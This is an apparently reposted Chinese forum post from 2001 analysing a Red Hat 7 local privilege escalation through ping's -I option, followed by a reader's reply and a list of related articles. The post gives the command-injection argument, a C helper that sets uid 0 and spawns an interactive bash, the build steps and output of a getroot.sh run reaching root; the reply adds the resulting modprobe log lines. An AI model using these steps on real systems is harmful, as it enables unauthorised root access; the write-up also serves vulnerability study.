redhat7本地利用ping拿root漏洞详析 添加书签

原创 2001年03月02日 12:22:00
本帖版权归原作者,其它网站转载须注明出处,传统媒体转载须事先与原作者和e龙西祠胡同[http://www.xici.net]联系。
doc0.gif 作者: 大鹰 发表日期: 2001-02-24 02:00:25 返回《黑客也是侠》 快速返回

redhat7本地利用ping拿root漏洞详析
作者:大鹰
<suneagle@patching.net>
首先声明,我不公布攻击程序的原代码,虽然网上已经有了,但我不公布出来是我不会为此负责。知道了
这个漏洞的原理相信大家自己可以写出攻击代码,我贴一些关键代码以供分析。代码不长,可以用shell或
perl来编写,推荐用shell写(shell的重要性不在累述)。
原理:
也许是redhat7的重大漏洞吧,他的ping程序的-I参数允许利用格式化字符串来执行任意代码,大家都知道
ping程序的权位是这样的:
[Hello!sune4gle]$ ls -l /bin/ping
-rwsr-xr-x  1 root   root    20604 Aug  8 2000 /bin/ping
具有s权位,所以我们就有大文章可做了,呵呵,我们可以通过用ping的-I参数来ping一个不存在的ip,当
然ip前面的参数是关键,也就是我们的执行命令,s权位令我们以普通权限的uid来运行ping时的euid为0,
所以实际上我们在运行ping的一瞬间是以超级拥护的权限在执行命令的。这样如果我们运行如下的命令的
话:
[Hello!sune4gle]$ping -I ';chmod o+w .' 195.117.3.59 &>/dev/null
就是把当前目录对其他用户可写了,呵呵,当然我们可以利用sleep语句来使该进程等待,利用等待的时间
我们可以写一个c程序,让他编译并且运行:
cat >/x.c <<_eof_
main() {
 setuid(0); seteuid(0);
 system("chmod 755 /;rm -f /x; rm -f /x.c");
 execl("/bin/bash","bash","-i",0);
}
_eof_
gcc /x.c -o /x
chmod 755 /x
到这里大家应该都明白了吧?呵呵在/下创建x.c文件,并且编译,使它也拥有s权位,呵呵就使一个setuid
的rootshell啦,哈哈,好,我把我这个shell在redhat7下的运行测试结果贴出来:
首先我得有个普通帐户,嘿嘿
[Hello!sune4gle]$ ./getroot.sh
RedHat 7.0 exploit
(c) 2000 suneagle <suneagle@patching.net>
Enjoy hacking! :)
Phase 1: making / world-writable...
Phase 2: compiling helper program in /...
Phase 3: chown+chmod on our helper program...
Ye! Entering rootshell...
[Hello!root]# id
uid=0(root) gid=500(sune4gle) groups=500(sune4gle)
[Hello!root]#

 

ping 要调用raw_socket 所有有s位
-I 是指定interface
这里的问题应该不是格式化字符串的漏洞吧

是在指定interface的时候用到了modprobe和insmod

Feb 24 11:16:27 ssq modprobe: modprobe: insmod ;chmod o+w . failed
Feb 24 11:16:30 ssq modprobe: modprobe: insmod ;chown 0 x failed
Feb 24 11:16:31 ssq modprobe: modprobe: insmod ;chmod +s x failed
这是攻击后的log

 

spring 源码解读与设计详解:6 BeanDefinitionParserDelegate与资源解析

spring 源码解读与设计详解:6 BeanDefinitionParserDelegate与资源解析  spring 源码解读与设计详解:6 BeanDefinitionParserDelegat...
  • sundenskyqq
  • sundenskyqq
  • 2015年05月29日 21:04
  • 2098

android安全以及root利用的漏洞

本文主要记录相关漏洞和root原理,有时间就关注下,不定期更新。有同样兴趣的可以互相交流。 其中有的可能已修复或者无法再次利用,只做兴趣记录的资料。 1.利用adbd进程的降权失败,从而使得adbd有...
  • tanwei4199
  • tanwei4199
  • 2013年12月24日 19:29
  • 2057

cve-2015-0569 安卓手机提权ROOT漏洞 分析

测试机器:nexus4       android版本:4.4   内核版本3.4.0  漏洞介绍:函数进行拷贝时没有对长度进行判断,导致用户可以修改内核栈中值。 漏洞利用:通过修改函数返回地址,...
  • omnispace
  • omnispace
  • 2016年03月20日 09:20
  • 1769

spring 源码解读与设计详解:1 框架搭建

从今天起,开始写一系列的对呀spring的源码的解读和设计详解的相关文章。开篇第一章,框架搭建。 1、官网下载spring所需的jar包等,地址:http://spring.io/   (projec...
  • sundenskyqq
  • sundenskyqq
  • 2015年01月31日 20:44
  • 2537

spring 源码解读与设计详解:2 BeanFactory

在spring的官网中我们看到,spring的产品已经发展的非常壮大,然而很多产品对于很多公司来讲用的非常少,甚至用不到。因此本系列的源码解读也不会涉及全部的spring的产品。而是只对spring的...
  • sundenskyqq
  • sundenskyqq
  • 2015年02月11日 15:15
  • 2252

RHEL7 忘记密码修改root密码

博客链接:http://blog.csdn.net/derkampf/article/details/54346516RHEL7进入单用户方式和重置密码方式发生了较大变化,GRUB由b引导变成了ctr...
  • derkampf
  • derkampf
  • 2017年01月11日 18:50
  • 4964

Android 操作系统获取Root权限 原理详细解析

许多机友新购来的Android机器没有破解过Root权限,无法使用一些需要高权限的软件,以及进行一些高权限的操作,其实破解手机Root权限是比较简单及安全的,破解Root权限的原理就是在手机的/sys...
  • mdx20072419
  • mdx20072419
  • 2015年11月18日 10:55
  • 1631

调研VxWorks漏洞数据库

现在任务如下: 1、调研源代码分析工具 2、调研漏洞扫描工具 3、调研VxWorks漏洞数据库 1. VxWorks存在多个安全漏洞 http://www.venustec...
  • huiyuanai222
  • huiyuanai222
  • 2015年07月01日 11:15
  • 827

如何给PDF文件添加书签及子书签

在网上下载的pdf文档经常没有书签目录,这样翻阅起来很不方便。如果添加一个书签目录的话,是不是会方便许多呢?下面我就想大家介绍一下如何给pdf文件添加书签目录。 首先打开想要添加目录的pdf文件,这...
  • laobai1015
  • laobai1015
  • 2016年11月17日 11:45
  • 3544

缓冲区溢出漏洞实验

缓冲区溢出漏洞实验 本实验利用缓冲区溢出漏洞,通过修改函数返回地址,实现了获取带有root权限的shell。...
  • qq_29687403
  • qq_29687403
  • 2015年07月11日 11:24
  • 1030
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:redhat7本地利用ping拿root漏洞详析 添加书签
举报原因:
原因补充:

(最多只允许输入30个字)